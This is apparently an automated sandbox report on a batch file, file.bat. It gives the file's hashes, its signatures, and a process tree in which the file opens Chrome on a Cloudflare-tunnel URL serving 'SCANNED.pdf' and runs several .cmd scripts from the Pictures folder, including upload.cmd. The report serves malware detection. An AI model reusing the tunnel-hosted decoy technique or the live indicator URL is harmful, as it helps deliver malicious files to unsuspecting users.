Edit tour

Windows Analysis Report
file.bat

Overview

General Information

Sample name:	file.bat
Analysis ID:	1446632
MD5:	2125f3d556ad5c646f7ec80168bdbb15
SHA1:	4fc0591f079e142e327c3fc4da0fc98c562342bc
SHA256:	ef9e3f4e08e0ca9d2ba97951b3dce68e8ce385c4c05a0ef8aedbe3b59e016367
Tags:	bat
Infos:

Detection

Score:	4
Range:	0 - 100
Whitelisted:	false
Confidence:	80%

Signatures

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Cloudflared Tunnels Related DNS Requests

Classification

Process Tree

System is w10x64

cmd.exe (PID: 1768 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\file.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6440 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\file.bat" MY_FLAG MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chrome.exe (PID: 7120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://valuable-gazette-shock-medication.trycloudflare.com/SCANNED.pdf MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 7372 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2684 --field-trial-handle=2636,i,6799672374632597056,542459975997173422,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cmd.exe (PID: 6760 cmdline: cmd /c ""C:\Users\user\Pictures\kam.cmd"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4036 cmdline: cmd /c ""C:\Users\user\Pictures\las.cmd"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6004 cmdline: cmd /c ""C:\Users\user\Pictures\zap.cmd"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5404 cmdline: cmd /c ""C:\Users\user\Pictures\sample.cmd"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2312 cmdline: cmd /c ""C:\Users\user\Pictures\xff.cmd"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 920 cmdline: cmd /c ""C:\Users\user\Pictures\time.cmd"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7296 cmdline: cmd /c ""C:\Users\user\Pictures\upload.cmd"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7448 cmdline: cmd /c ""C:\Users\user\Pictures\update.cmd"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7816 cmdline: cmd /c ""C:\Users\user\Pictures\info.cmd"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

Sigma detected: Cloudflared Tunnels Related DNS Requests

Source: DNS query

Author: Nasreddine Bencherchali (Nextron Systems): Data: Image: C:\Program Files\Google\Chrome\Application\chrome.exe, QueryName: valuable-gazette-shock-medication.trycloudflare.com

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.7:49716 version: TLS 1.2

Source: global traffic

TCP traffic: 192.168.2.7:61582 -> 1.1.1.1:53

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157

Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=HTyOcDWCCFHwzRB&MD=eFOmFNP4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=HTyOcDWCCFHwzRB&MD=eFOmFNP4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: valuable-gazette-shock-medication.trycloudflare.com
Source: global traffic	DNS traffic detected: DNS query: google.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: sets.json.6.dr	String found in binary or memory: https://abczdrowie.pl
Source: sets.json.6.dr	String found in binary or memory: https://alice.tw
Source: sets.json.6.dr	String found in binary or memory: https://autobild.de
Source: sets.json.6.dr	String found in binary or memory: https://baomoi.com
Source: sets.json.6.dr	String found in binary or memory: https://bild.de
Source: sets.json.6.dr	String found in binary or memory: https://blackrock.com
Source: sets.json.6.dr	String found in binary or memory: https://blackrockadvisorelite.it
Source: sets.json.6.dr	String found in binary or memory: https://bluradio.com
Source: sets.json.6.dr	String found in binary or memory: https://bolasport.com
Source: sets.json.6.dr	String found in binary or memory: https://bonvivir.com
Source: sets.json.6.dr	String found in binary or memory: https://bumbox.com
Source: sets.json.6.dr	String found in binary or memory: https://businessinsider.com.pl
Source: sets.json.6.dr	String found in binary or memory: https://cachematrix.com
Source: sets.json.6.dr	String found in binary or memory: https://cafemedia.com
Source: sets.json.6.dr	String found in binary or memory: https://caracoltv.com
Source: sets.json.6.dr	String found in binary or memory: https://carcostadvisor.be
Source: sets.json.6.dr	String found in binary or memory: https://carcostadvisor.com
Source: sets.json.6.dr	String found in binary or memory: https://carcostadvisor.fr
Source: sets.json.6.dr	String found in binary or memory: https://cardsayings.net
Source: sets.json.6.dr	String found in binary or memory: https://chennien.com
Source: sets.json.6.dr	String found in binary or memory: https://clarosports.com
Source: sets.json.6.dr	String found in binary or memory: https://clmbtech.com
Source: sets.json.6.dr	String found in binary or memory: https://clubelpais.com.uy
Source: sets.json.6.dr	String found in binary or memory: https://cmxd.com.mx
Source: sets.json.6.dr	String found in binary or memory: https://commentcamarche.com
Source: sets.json.6.dr	String found in binary or memory: https://commentcamarche.net
Source: sets.json.6.dr	String found in binary or memory: https://computerbild.de
Source: sets.json.6.dr	String found in binary or memory: https://cookreactor.com
Source: sets.json.6.dr	String found in binary or memory: https://cricbuzz.com
Source: sets.json.6.dr	String found in binary or memory: https://desimartini.com
Source: sets.json.6.dr	String found in binary or memory: https://dewarmsteweek.be
Source: sets.json.6.dr	String found in binary or memory: https://economictimes.com
Source: sets.json.6.dr	String found in binary or memory: https://een.be
Source: sets.json.6.dr	String found in binary or memory: https://efront.com
Source: sets.json.6.dr	String found in binary or memory: https://eleconomista.net
Source: sets.json.6.dr	String found in binary or memory: https://elfinancierocr.com
Source: sets.json.6.dr	String found in binary or memory: https://elgrafico.com
Source: sets.json.6.dr	String found in binary or memory: https://ella.sv
Source: sets.json.6.dr	String found in binary or memory: https://elpais.com.uy
Source: sets.json.6.dr	String found in binary or memory: https://elpais.uy
Source: sets.json.6.dr	String found in binary or memory: https://etfacademy.it
Source: sets.json.6.dr	String found in binary or memory: https://eworkbookcloud.com
Source: sets.json.6.dr	String found in binary or memory: https://eworkbookrequest.com
Source: sets.json.6.dr	String found in binary or memory: https://fakt.pl
Source: sets.json.6.dr	String found in binary or memory: https://finn.no
Source: sets.json.6.dr	String found in binary or memory: https://firstlook.biz
Source: sets.json.6.dr	String found in binary or memory: https://gallito.com.uy
Source: sets.json.6.dr	String found in binary or memory: https://gettalkdesk.com
Source: sets.json.6.dr	String found in binary or memory: https://gliadomain.com
Source: sets.json.6.dr	String found in binary or memory: https://grid.id
Source: sets.json.6.dr	String found in binary or memory: https://gridgames.app
Source: sets.json.6.dr	String found in binary or memory: https://growthrx.in
Source: sets.json.6.dr	String found in binary or memory: https://grupolpg.sv
Source: sets.json.6.dr	String found in binary or memory: https://gujaratijagran.com
Source: sets.json.6.dr	String found in binary or memory: https://hapara.com
Source: sets.json.6.dr	String found in binary or memory: https://hc1.com
Source: sets.json.6.dr	String found in binary or memory: https://hc1.global
Source: sets.json.6.dr	String found in binary or memory: https://hc1cas.com
Source: sets.json.6.dr	String found in binary or memory: https://hc1cas.global
Source: sets.json.6.dr	String found in binary or memory: https://healthshots.com
Source: sets.json.6.dr	String found in binary or memory: https://hearty.app
Source: sets.json.6.dr	String found in binary or memory: https://hearty.gift
Source: sets.json.6.dr	String found in binary or memory: https://hearty.me
Source: sets.json.6.dr	String found in binary or memory: https://heartymail.com
Source: sets.json.6.dr	String found in binary or memory: https://hindustantimes.com
Source: sets.json.6.dr	String found in binary or memory: https://hj.rs
Source: sets.json.6.dr	String found in binary or memory: https://hjck.com
Source: sets.json.6.dr	String found in binary or memory: https://human-talk.org
Source: sets.json.6.dr	String found in binary or memory: https://idbs-cloud.com
Source: sets.json.6.dr	String found in binary or memory: https://idbs-dev.com
Source: sets.json.6.dr	String found in binary or memory: https://idbs-eworkbook.com
Source: sets.json.6.dr	String found in binary or memory: https://idbs-staging.com
Source: sets.json.6.dr	String found in binary or memory: https://indiatimes.com
Source: sets.json.6.dr	String found in binary or memory: https://iolam.it
Source: sets.json.6.dr	String found in binary or memory: https://ishares.com
Source: sets.json.6.dr	String found in binary or memory: https://jagran.com
Source: sets.json.6.dr	String found in binary or memory: https://journaldesfemmes.com
Source: sets.json.6.dr	String found in binary or memory: https://journaldesfemmes.fr
Source: sets.json.6.dr	String found in binary or memory: https://journaldunet.com
Source: sets.json.6.dr	String found in binary or memory: https://journaldunet.fr
Source: sets.json.6.dr	String found in binary or memory: https://joyreactor.cc
Source: sets.json.6.dr	String found in binary or memory: https://joyreactor.com
Source: sets.json.6.dr	String found in binary or memory: https://kaksya.in
Source: sets.json.6.dr	String found in binary or memory: https://kompas.com
Source: sets.json.6.dr	String found in binary or memory: https://kompas.tv
Source: sets.json.6.dr	String found in binary or memory: https://kompasiana.com
Source: sets.json.6.dr	String found in binary or memory: https://lanacion.com.ar
Source: sets.json.6.dr	String found in binary or memory: https://landyrev.com
Source: sets.json.6.dr	String found in binary or memory: https://landyrev.ru
Source: sets.json.6.dr	String found in binary or memory: https://laprensagrafica.com
Source: sets.json.6.dr	String found in binary or memory: https://lateja.cr
Source: sets.json.6.dr	String found in binary or memory: https://libero.it
Source: sets.json.6.dr	String found in binary or memory: https://linternaute.com
Source: sets.json.6.dr	String found in binary or memory: https://linternaute.fr
Source: sets.json.6.dr	String found in binary or memory: https://livehindustan.com
Source: sets.json.6.dr	String found in binary or memory: https://livemint.com
Source: sets.json.6.dr	String found in binary or memory: https://max.auto
Source: sets.json.6.dr	String found in binary or memory: https://medonet.pl
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.cl
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.co.cr
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.com
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.com.ar
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.com.bo
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.com.co
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.com.do
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.com.ec
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.com.gt
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.com.hn
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.com.mx
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.com.ni
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.com.pa
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.com.pe
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.com.py
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.com.sv
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.com.uy
Source: sets.json.6.dr	String found in binary or memory: https://mercadolibre.com.ve
Source: sets.json.6.dr	String found in binary or memory: https://mercadolivre.com
Source: sets.json.6.dr	String found in binary or memory: https://mercadolivre.com.br
Source: sets.json.6.dr	String found in binary or memory: https://mercadopago.cl
Source: sets.json.6.dr	String found in binary or memory: https://mercadopago.com
Source: sets.json.6.dr	String found in binary or memory: https://mercadopago.com.ar
Source: sets.json.6.dr	String found in binary or memory: https://mercadopago.com.br
Source: sets.json.6.dr	String found in binary or memory: https://mercadopago.com.co
Source: sets.json.6.dr	String found in binary or memory: https://mercadopago.com.ec
Source: sets.json.6.dr	String found in binary or memory: https://mercadopago.com.mx
Source: sets.json.6.dr	String found in binary or memory: https://mercadopago.com.pe
Source: sets.json.6.dr	String found in binary or memory: https://mercadopago.com.uy
Source: sets.json.6.dr	String found in binary or memory: https://mercadopago.com.ve
Source: sets.json.6.dr	String found in binary or memory: https://mercadoshops.cl
Source: sets.json.6.dr	String found in binary or memory: https://mercadoshops.com
Source: sets.json.6.dr	String found in binary or memory: https://mercadoshops.com.ar
Source: sets.json.6.dr	String found in binary or memory: https://mercadoshops.com.br
Source: sets.json.6.dr	String found in binary or memory: https://mercadoshops.com.co
Source: sets.json.6.dr	String found in binary or memory: https://mercadoshops.com.mx
Source: sets.json.6.dr	String found in binary or memory: https://mighty-app.appspot.com
Source: sets.json.6.dr	String found in binary or memory: https://mightytext.net
Source: sets.json.6.dr	String found in binary or memory: https://mittanbud.no
Source: sets.json.6.dr	String found in binary or memory: https://money.pl
Source: sets.json.6.dr	String found in binary or memory: https://mystudentdashboard.com
Source: sets.json.6.dr	String found in binary or memory: https://nacion.com
Source: sets.json.6.dr	String found in binary or memory: https://nidhiacademyonline.com
Source: sets.json.6.dr	String found in binary or memory: https://nien.co
Source: sets.json.6.dr	String found in binary or memory: https://nien.com
Source: sets.json.6.dr	String found in binary or memory: https://nien.org
Source: sets.json.6.dr	String found in binary or memory: https://noticiascaracol.com
Source: sets.json.6.dr	String found in binary or memory: https://nourishingpursuits.com
Source: sets.json.6.dr	String found in binary or memory: https://o2.pl
Source: sets.json.6.dr	String found in binary or memory: https://ocdn.eu
Source: sets.json.6.dr	String found in binary or memory: https://onet.pl
Source: sets.json.6.dr	String found in binary or memory: https://ottplay.com
Source: sets.json.6.dr	String found in binary or memory: https://paula.com.uy
Source: sets.json.6.dr	String found in binary or memory: https://pdmp-apis.no
Source: sets.json.6.dr	String found in binary or memory: https://phonandroid.com
Source: sets.json.6.dr	String found in binary or memory: https://player.pl
Source: sets.json.6.dr	String found in binary or memory: https://plejada.pl
Source: sets.json.6.dr	String found in binary or memory: https://poalim.site
Source: sets.json.6.dr	String found in binary or memory: https://poalim.xyz
Source: sets.json.6.dr	String found in binary or memory: https://portalinmobiliario.com
Source: sets.json.6.dr	String found in binary or memory: https://prisjakt.no
Source: sets.json.6.dr	String found in binary or memory: https://pudelek.pl
Source: sets.json.6.dr	String found in binary or memory: https://punjabijagran.com
Source: sets.json.6.dr	String found in binary or memory: https://radio1.be
Source: sets.json.6.dr	String found in binary or memory: https://radio2.be
Source: sets.json.6.dr	String found in binary or memory: https://reactor.cc
Source: sets.json.6.dr	String found in binary or memory: https://repid.org
Source: sets.json.6.dr	String found in binary or memory: https://reshim.org
Source: sets.json.6.dr	String found in binary or memory: https://rws1nvtvt.com
Source: sets.json.6.dr	String found in binary or memory: https://rws2nvtvt.com
Source: sets.json.6.dr	String found in binary or memory: https://rws3nvtvt.com
Source: sets.json.6.dr	String found in binary or memory: https://salemoveadvisor.com
Source: sets.json.6.dr	String found in binary or memory: https://salemovefinancial.com
Source: sets.json.6.dr	String found in binary or memory: https://salemovetravel.com
Source: sets.json.6.dr	String found in binary or memory: https://samayam.com
Source: sets.json.6.dr	String found in binary or memory: https://shock.co
Source: sets.json.6.dr	String found in binary or memory: https://smoney.vn
Source: sets.json.6.dr	String found in binary or memory: https://songshare.com
Source: sets.json.6.dr	String found in binary or memory: https://songstats.com
Source: sets.json.6.dr	String found in binary or memory: https://sporza.be
Source: sets.json.6.dr	String found in binary or memory: https://standardsandpraiserepurpose.com
Source: sets.json.6.dr	String found in binary or memory: https://startupislandtaiwan.com
Source: sets.json.6.dr	String found in binary or memory: https://startupislandtaiwan.net
Source: sets.json.6.dr	String found in binary or memory: https://startupislandtaiwan.org
Source: sets.json.6.dr	String found in binary or memory: https://stripe.com
Source: sets.json.6.dr	String found in binary or memory: https://stripe.network
Source: sets.json.6.dr	String found in binary or memory: https://stripecdn.com
Source: sets.json.6.dr	String found in binary or memory: https://supereva.it
Source: sets.json.6.dr	String found in binary or memory: https://talkdeskqaid.com
Source: sets.json.6.dr	String found in binary or memory: https://talkdeskstgid.com
Source: sets.json.6.dr	String found in binary or memory: https://teacherdashboard.com
Source: sets.json.6.dr	String found in binary or memory: https://technology-revealed.com
Source: sets.json.6.dr	String found in binary or memory: https://textyserver.appspot.com
Source: sets.json.6.dr	String found in binary or memory: https://timesinternet.in
Source: sets.json.6.dr	String found in binary or memory: https://timesofindia.com
Source: sets.json.6.dr	String found in binary or memory: https://tribunnews.com
Source: sets.json.6.dr	String found in binary or memory: https://trytalkdesk.com
Source: sets.json.6.dr	String found in binary or memory: https://tucarro.com
Source: sets.json.6.dr	String found in binary or memory: https://tucarro.com.co
Source: sets.json.6.dr	String found in binary or memory: https://tucarro.com.ve
Source: sets.json.6.dr	String found in binary or memory: https://tvid.in
Source: sets.json.6.dr	String found in binary or memory: https://tvn.pl
Source: sets.json.6.dr	String found in binary or memory: https://tvn24.pl
Source: sets.json.6.dr	String found in binary or memory: https://unotv.com
Source: file.bat	String found in binary or memory: https://valuable-gazette-shock-medication.trycloudflare.com/SCANNED.pdf
Source: sets.json.6.dr	String found in binary or memory: https://victorymedium.com
Source: sets.json.6.dr	String found in binary or memory: https://vrt.be
Source: sets.json.6.dr	String found in binary or memory: https://vwo.com
Source: sets.json.6.dr	String found in binary or memory: https://welt.de
Source: sets.json.6.dr	String found in binary or memory: https://wieistmeineip.de
Source: sets.json.6.dr	String found in binary or memory: https://wildix.com
Source: sets.json.6.dr	String found in binary or memory: https://wildixin.com
Source: sets.json.6.dr	String found in binary or memory: https://wingify.com
Source: sets.json.6.dr	String found in binary or memory: https://wordle.at
Source: sets.json.6.dr	String found in binary or memory: https://wp.pl
Source: sets.json.6.dr	String found in binary or memory: https://wpext.pl
Source: sets.json.6.dr	String found in binary or memory: https://www.asadcdn.com
Source: sets.json.6.dr	String found in binary or memory: https://ya.ru
Source: sets.json.6.dr	String found in binary or memory: https://zalo.me
Source: sets.json.6.dr	String found in binary or memory: https://zdrowietvn.pl
Source: sets.json.6.dr	String found in binary or memory: https://zingmp3.vn

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61587 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61584 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61584
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61587

Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.7:49716 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7120_1970308789	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7120_1970308789\sets.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7120_1970308789\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7120_1970308789\LICENSE	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7120_1970308789\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7120_1970308789\_metadata\verified_contents.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7120_1970308789\manifest.fingerprint	Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\chrome_BITS_7120_1853999822

Jump to behavior

Source: classification engine

Classification label: clean4.winBAT@53/5@22/4

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2868:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5380:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_03

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\file.bat" "

